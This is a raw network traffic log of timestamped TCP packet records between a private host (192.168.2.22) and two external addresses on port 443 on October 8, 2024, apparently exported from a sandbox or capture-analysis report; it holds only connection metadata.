                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.959165096 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.959193945 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.959237099 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.959237099 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.959244967 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004163980 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004189968 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004291058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004302979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004317999 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004344940 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004347086 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004483938 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004489899 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004678965 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.004729033 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.223406076 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.242769003 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.242790937 CEST44349167188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246520042 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246534109 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246546030 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246587038 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246602058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246630907 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246643066 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246679068 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246679068 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246686935 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246704102 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246737003 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246746063 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246747017 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246747017 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246756077 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246778965 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246809006 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246815920 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246815920 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246829987 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246853113 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246859074 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246861935 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246932030 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246954918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246954918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246963978 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246978998 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246978998 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246978998 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246984959 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246994019 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246994019 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246994019 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.246994972 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247006893 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247008085 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247006893 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247006893 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247018099 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247035027 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247035027 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247036934 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247041941 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247045994 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247080088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247092009 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247214079 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247214079 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247214079 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247222900 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247232914 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247243881 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247246981 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247255087 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247262001 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247265100 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247267008 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247268915 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247279882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247279882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247279882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247279882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247279882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247279882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247279882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247279882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247292995 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247303963 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247303963 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247303963 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247314930 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247314930 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247314930 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247314930 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247314930 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247324944 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247324944 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247330904 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247330904 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247337103 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247337103 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247337103 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247345924 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247345924 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247353077 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247353077 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247353077 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247365952 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247365952 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247365952 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247386932 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247386932 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247386932 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247386932 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247406006 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247406006 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247406006 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.247416973 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.250690937 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.251411915 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.264998913 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265022993 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265093088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265093088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265100956 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265453100 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265481949 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265500069 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265517950 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265535116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265816927 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265839100 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265908003 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265908003 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265908003 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.265918016 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266206026 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266232014 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266282082 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266282082 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266292095 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266750097 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266771078 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266813993 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266813993 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266823053 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.266844988 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.267007113 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.267035961 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.267065048 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.267072916 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.267092943 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.307620049 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.307652950 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.307728052 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.307740927 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.307751894 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.307780981 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.307840109 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.307840109 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.307848930 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.308747053 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353251934 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353285074 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353351116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353351116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353360891 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353415966 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353545904 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353553057 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353673935 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353697062 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353739977 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353746891 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353771925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353905916 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353931904 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353987932 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353987932 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.353996038 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.354434967 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.354456902 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.354501963 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.354507923 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.354526997 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.354543924 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.354569912 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.354619980 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.354619980 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.354629040 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.357336998 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.394489050 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.394514084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.394610882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.394625902 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.394793987 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.394829035 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.394881010 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.394881010 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.394889116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.412404060 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.439965963 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.439995050 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440170050 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440182924 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440784931 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440812111 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440876007 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440876007 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440882921 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440913916 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440936089 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440969944 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.440977097 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.441087008 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.441282988 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.441309929 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.441348076 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.441354036 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.441371918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.442003012 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.442027092 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.442069054 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.442076921 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.442141056 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.447153091 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.481259108 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.481288910 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.481333017 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.481348991 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.481372118 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.482223988 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.482253075 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.482296944 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.482306004 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.482343912 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.483659029 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.526375055 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.526401997 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.526474953 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.526474953 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.526487112 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.526561022 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.526962996 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.526989937 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527040005 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527040005 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527049065 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527379036 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527405024 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527452946 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527452946 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527462959 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527508974 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527832985 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527858019 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527889013 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527899981 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.527932882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528182983 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528203964 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528237104 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528255939 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528261900 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528415918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528448105 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528470039 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528492928 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528513908 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528518915 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.528717995 CEST49166443192.168.2.22207.241.227.242
